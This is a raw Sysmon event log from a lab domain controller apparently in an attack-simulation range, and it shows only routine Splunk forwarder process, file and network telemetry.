13:56:02.275{5ABCFE62-E6F2-6040-ED4D-00000000AD01}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200921Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=540CAA150E343340D65BE7979FE7D731,SHA256=AA3E1D8D12144B3E3409A99A5C3CEA6F15E9F1435278B5DA8C859FB3EEC1EA33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200950Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.665{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC927EBC16101D61A51B9DE83058017E,SHA256=61A3F2B4790D78D5C714DE4A3C48ED370C13FF84ED2405BCA64359FB6C5BB8B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200949Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.524{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6F3-6040-EF4D-00000000AD01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200948Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.524{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200947Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.524{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200946Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.524{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200945Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.524{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200944Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.524{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E6F3-6040-EF4D-00000000AD01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200943Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.524{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6F3-6040-EF4D-00000000AD01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200942Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.525{5ABCFE62-E6F3-6040-EF4D-00000000AD01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200941Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.259{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7236AC510945C46B9589FBE75313F06F,SHA256=63621373F0A1F6F21DDEF30787C3EDE2DA2B14DD4CC908646359052B2940C44A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200940Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:59.049{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55173-false10.0.1.12-8000- 10341000x80000000000000002200939Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:03.024{5ABCFE62-E6F2-6040-EE4D-00000000AD01}57806136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200952Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:04.725{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A099A424CF7E20ADD207629C2823C5EB,SHA256=BF9EB4E351741594F42B2BC9E291105D2043E13C4D68016A06998527F037760C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200951Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:04.725{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=455BCF34255187F6ADCCE08F84D53E04,SHA256=B124CB6C1D33CC16A3E50EAB9D76066F8D382A6219BC3D318216E6C264BE5E55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200953Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:05.740{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49417D22E3A8D827BE77C46C6D5B6A57,SHA256=8FD6B73B1B4EC7D47834F97C6456683FDDAD7A90D59DB646F2467A0A718E6EE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200955Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:06.743{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200954Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:06.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEFA71A1E753B51DB2DC0B46EEEC5D01,SHA256=1B34FE435C7E31E38C912E966ED6057472AB611ECFF26842309E4C9530539B63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200957Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:07.774{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F77BB81E398891E7E5FA6B8D734D879D,SHA256=14ADFB8078E6386A362181E26E21E3379AE8B1D0BE31D5C1368C32BEF3BCC150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200956Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:07.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CDDA26A3BD16381EE557D08C2E20D61,SHA256=6591D27D372684DEEF8967D9E4994B1326F7748EA3356BD3FE1465FC1F548063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200959Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:08.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDD73EA045A2B89407D4E32CE4D8EFC6,SHA256=BFC486C5A26FD888DB11B632AA4FFEA6EF5C470F5F2D3DD5AAA0CCB787ADED4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200958Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:04.064{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55174-false10.0.1.12-8000- 23542300x80000000000000002200961Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:09.821{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37EE15DB6330CBE345F21F2697098097,SHA256=CD919DB291D6D9CD6D5C8A793CA28C08CF79AF64F73E358A5E3C9EBC48F7B332,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200960Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:04.564{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55175-false10.0.1.12-8089- 23542300x80000000000000002200962Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:10.821{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5B341C79318E5B1E11BF3EBEDBA6317,SHA256=3AC52F569D394316BCFE8397FD07924EF2E18C5C678D9A498ABC2E53605638A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200963Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:11.837{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DBE0630AFEF9DF9275F04EF252C8AE4,SHA256=716CF80F11BB0D6AAB5F1CE8345DCCA28DA0F5CE4769C3DA8C18F2F7A47FA0A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200964Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:12.837{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=703FA29013FFC758501C658915C76DAC,SHA256=C84080BE7B144AFB49BC1E1D091B0FAE82CF6F26813372E824B28749B72640AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200967Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:13.884{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B1A29F87936BD1423387D1438AFCFEA,SHA256=3D0D96F9E6A8A119C445AF24794F9BC38CBCA3E9301EB45079A30E545BF77F38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200966Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:13.102{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DA8D7647E296C8A06EFBA20C6FCD0EF,SHA256=B48F4A991FD3248B95D0EC7FE28CAD1238D0F2FD6129F13BC09BB5D6DF0598C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200965Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:13.102{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=624E7E0556A9E6060512B08FE0DBF7C7,SHA256=DEE19DAE090F38521779C5227659232AFA06DCB6ED7FE3D640CE89AA3F6144CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200969Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:14.899{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FE62B126A2005579B212569E122772D,SHA256=9930EBE3CB67CE008961B7B6A92AC8E37323C84FED91A05BBFAE0EFE572D6C97,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200968Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:09.908{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55176-false10.0.1.12-8000- 23542300x80000000000000002200970Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:15.915{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9026550F34B734449719E92DC32E65D,SHA256=75B5B5C7F08C5B7B644EE0E6A441C313E57B6C8785D61FEF0A1FAC8504381D0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200972Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:16.962{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DA8D7647E296C8A06EFBA20C6FCD0EF,SHA256=B48F4A991FD3248B95D0EC7FE28CAD1238D0F2FD6129F13BC09BB5D6DF0598C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200971Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:16.931{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12281A98234AE2D9520C642D29838654,SHA256=FD04EC30A87F43B96DF45F31CD64677A47C3FA0638B6C363FE259B784A5746BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200981Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.946{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE251EF005A95749F987FD82FFE86C6D,SHA256=1756EB9CBF7877AA4E698853BC04E4C4CF6053D428F2E5625D698A78886B1C83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200980Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.571{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E701-6040-F04D-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200979Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.571{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200978Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.571{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200977Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 